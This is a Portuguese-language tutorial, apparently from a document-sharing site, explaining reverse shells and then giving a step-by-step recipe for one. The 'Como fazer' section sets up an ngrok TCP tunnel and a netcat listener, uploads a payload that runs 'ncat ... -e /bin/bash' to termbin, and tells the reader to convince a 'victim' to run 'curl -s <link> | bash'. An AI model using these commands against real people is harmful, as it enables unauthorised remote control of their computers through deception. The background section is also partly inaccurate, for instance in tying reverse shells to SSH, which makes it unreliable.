Você está na página 1de 2

Shell Reverse

Made by Trashzinx

Oque é?

● Shell Reverse é um tipo de técnica de invasão de segurança usada para obter o acesso ao computador de um usuário. Ela funciona
criando uma conexão de shell reversa entre um atacante e seu alvo de modo que o invasor tenha acesso remoto ao computador do alvo.
Com isso, ele pode usar a máquina comprometida para realizar inúmeros tipos de atividades, desde obter informações confidenciais a
invadir outros dispositivos da rede.

Como funciona?

● Shell reverse é executado usando software como SSH (Secure Shell) para estabelecer a conexão remota. O atacante primeiro precisa
identificar uma vulnerabilidade no dispositivo de destino, como por exemplo, um bug de aplicação ou falha de configuração, que lhe dá
acesso à máquina do alvo. O software é configurado para criar um "túnel" entre o atacante e o alvo, através do qual o atacante tem acesso
aos recursos e arquivos contidos no sistema alvo.
Depois que o atacante tem acesso à máquina comprometida, ele pode usar recursos como controle remoto, acesso ao sistema de
arquivos, softwares de monitoramento, acesso a dados sensíveis, gerenciamento de aplicações remotas, etc.

Lado Negativo

● A técnica de shell reversa também tem seu lado negativo. Primeiro, ela é usada principalmente por invasores maliciosos, onde uma
conexão inadvertida pode acarretar em grande prejuízo para o usuário vítima. Por isso, é muito importante que o usuário mantenha
todos os seus dispositivos de forma segura e atualizada. Além disso, é recomendável que sejam usados softwares de proteção de
segurança como firewalls, antivírus e anti-spyware para evitar comprometimento das máquinas.
Usar a técnica shell reverse exige conhecimento técnico avançado, portanto recomenda-se que sejam usados softwares de segurança
de qualidade por parte dos usuários que desejam se proteger de possíveis ameaças que possam vir de invasores. É importante também
que sejam feitas verificações regulares nos recursos usados para prevenir ataques shell reversa no seu ambiente de trabalho.

Como fazer
1 - Faça a instalação do Ngrok pelo Site Oficial e Descompacte o arquivo.

https://ngrok.com/download

2 - Agora no Terminal insira seu token de autenticação desse jeito:

> ngrok authtoken <token>

3 - Agora inicie o ngrok para receber Pacotes TCP:

> ngrok tcp <port>

4 - Agora será necessário pegar o IP do domínio usando o ping:

> ping <LHOST>

Como vimos na imagem o Ip do domínio é "18.231.93.153".

5 - Agora vamos ver a porta do servidor:


Como vemos no print acima a porta é “12696”

6 - Agora só instalar o ncat ou o netcat (a "vítima" também vai precisar do netcat instalado).

> apt-get install netcat

Depois de fazer a instalação é só iniciar o netcat com o seguinte comando:

> nc -lvp <port>

Certo se você tiver feito tudo certo no final terá duas abas, uma com o ngrok e a outra com o netcat, agora você vai abrir uma terceira
aba.
Nessa aba você irá executar o seguinte comando:

> echo "pkg install nmap-ncat -y && ncat <IP Do Domínio> <porta> -e /bin/bash" | nc termbin.com 9999

Esse comando irá retornar um link, você copia esse link, agora só basta enviar e convencer a "vítima" a executar o seguinte código:

curl -s <link do termbin> | bash

Volte para a aba do netcat e aguarde a vítima se conectar.

Você também pode gostar